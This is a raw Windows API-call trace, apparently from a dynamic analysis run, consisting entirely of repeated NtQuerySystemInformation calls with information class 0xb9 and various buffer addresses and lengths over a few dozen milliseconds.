[0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.877] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed60, Length=0x28, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed60, Length=0x28, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.880] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebd0, Length=0x20, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.881] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eda0, Length=0x20, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.882] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) [0228.883] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec40, Length=0x20, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee30, Length=0x38, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ecc0, Length=0x20, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x20, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.915] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec50, Length=0x20, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ef58, Length=0x58, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x58, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.916] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.918] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x28, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.919] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x28, ResultLength=0x0) [0228.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x28, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x20, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x20, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x58, ResultLength=0x0) [0228.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x28, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x28, ResultLength=0x0) [0228.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.929] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x28, ResultLength=0x0) [0228.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb00, Length=0x20, ResultLength=0x0) [0228.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x20, ResultLength=0x0) [0228.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.930] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x20, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ea80, Length=0x20, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x20, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x58, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb70, Length=0x28, ResultLength=0x0) [0228.934] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebe0, Length=0x28, ResultLength=0x0) [0228.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.935] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x28, ResultLength=0x0) [0228.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.937] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ec60, Length=0x28, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x20, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x20, ResultLength=0x0) [0228.938] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed40, Length=0x38, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ebc0, Length=0x20, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb50, Length=0x20, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.939] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ee20, Length=0x58, ResultLength=0x0) [0228.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.940] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7ed00, Length=0x38, ResultLength=0x0) [0228.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.941] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x28, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x28, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x28, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0228.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751f7eb40, Length=0x28, ResultLength=0x0) 